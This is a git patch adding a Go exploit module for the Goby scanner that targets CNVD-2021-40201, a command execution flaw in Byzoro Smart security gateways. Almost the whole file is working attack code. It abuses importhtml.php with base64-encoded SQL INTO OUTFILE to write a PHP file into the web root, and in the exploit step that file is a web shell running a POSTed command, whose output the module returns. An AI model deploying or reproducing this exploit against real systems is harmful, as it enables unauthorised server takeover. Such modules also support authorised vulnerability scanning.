From 32365ee2f86900638f1c9146e0692baa0d695ec5 Mon Sep 17 00:00:00 2001 From: xiaoheihei1107 <62200676+xiaoheihei1107@users.noreply.github.com> Date: Wed, 18 Aug 2021 11:00:10 +0800 Subject: [PATCH] Add CNVD-2021-40201 --- ...mart_importhtml_php_RCE_CNVD_2021_40201.go | 102 ++++++++++++++++++ 1 file changed, 102 insertions(+) create mode 100644 Byzoro/CNVD-2021-40201/Byzoro_smart_importhtml_php_RCE_CNVD_2021_40201.go diff --git a/Byzoro/CNVD-2021-40201/Byzoro_smart_importhtml_php_RCE_CNVD_2021_40201.go b/Byzoro/CNVD-2021-40201/Byzoro_smart_importhtml_php_RCE_CNVD_2021_40201.go new file mode 100644 index 0000000..88da06a --- /dev/null +++ b/Byzoro/CNVD-2021-40201/Byzoro_smart_importhtml_php_RCE_CNVD_2021_40201.go @@ -0,0 +1,102 @@ +package exploits + +import ( + "encoding/base64" + "fmt" + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "strings" +) + +func init() { + expJson := `{ + "Name": "Byzoro smart importhtml.php RCE (CNVD-2021-40201)", + "Description": "Byzoro Networks Smart multi-service security gateway intelligent management platform has a command execution vulnerability. Attackers can use this vulnerability to gain control of the server.", + "Product": "Byzoro-Smart,Byzoro-Security-gateway", + "Homepage": "https://www.byzoro.com/", + "DisclosureDate": "2021-07-06", + "Author": "1291904552@qq.com", + "GobyQuery": "app=\"Byzoro-Smart\"||app=\"Byzoro-Security-gateway\"", + "Level": "2", + "Impact": "

", + "Recommandation": "", + "References": [ + "https://www.cnvd.org.cn/flaw/show/CNVD-2020-28786", + "https://www.cnvd.org.cn/flaw/show/CNVD-2021-40201" + ], + "HasExp": true, + "ExpParams": [ + { + "name": "cmd", + "type": "input", + "value": "id" + } + ], + "ExpTips": null, + "ScanSteps": null, + "ExploitSteps": null, + "Tags": [ + "rce" + ], + "CVEIDs": null, + "CVSSScore": "0.0", + "AttackSurfaces": { + "Application": ["Byzoro-Smart","Byzoro-Security-gateway"], + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + randFilename := goutils.RandomHexString(4) + sqlQuery := `select 0x3c3f706870206563686f206d643528323333293b756e6c696e6b285f5f46494c455f5f293b3f3e into outfile '/usr/hddocs/nsg/app/`+randFilename+`.php'` + uri_1 := `/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=`+base64.StdEncoding.EncodeToString([]byte(sqlQuery)) + cfg_1 := httpclient.NewGetRequestConfig(uri_1) + cfg_1.VerifyTls = false + if resp_1, err := httpclient.DoHttpRequest(u, cfg_1); err == nil { + if resp_1.StatusCode == 200 { + uri_2 := "/app/"+randFilename+".php" + cfg_2 := httpclient.NewGetRequestConfig(uri_2) + cfg_2.VerifyTls = false + if resp_2, err := httpclient.DoHttpRequest(u, cfg_2); err == nil { + return resp_2.StatusCode == 200 && strings.Contains(resp_2.RawBody,"e165421110ba03099a1c0393373c5b43") + } + } + } + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + cmd := ss.Params["cmd"].(string) + randFilename := goutils.RandomHexString(4) + sqlQuery := `select 0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e into outfile '/usr/hddocs/nsg/app/`+randFilename+`.php'` + uri_1 := `/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=`+base64.StdEncoding.EncodeToString([]byte(sqlQuery)) + cfg_1 := httpclient.NewGetRequestConfig(uri_1) + cfg_1.VerifyTls = false + if resp_1, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_1); err == nil { + if resp_1.StatusCode == 200 { + uri_2 := "/app/"+randFilename+".php" + cfg_2 := httpclient.NewPostRequestConfig(uri_2) + cfg_2.VerifyTls = false + cfg_2.Header.Store("Content-Type","application/x-www-form-urlencoded") + cfg_2.Data = fmt.Sprintf(`cmd=%s`,cmd) + if resp_2, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_2); err == nil { + if resp_2.StatusCode == 200{ + expResult.Output = resp_2.RawBody + expResult.Success = true + } + } + } + } + return expResult + }, + )) +} + +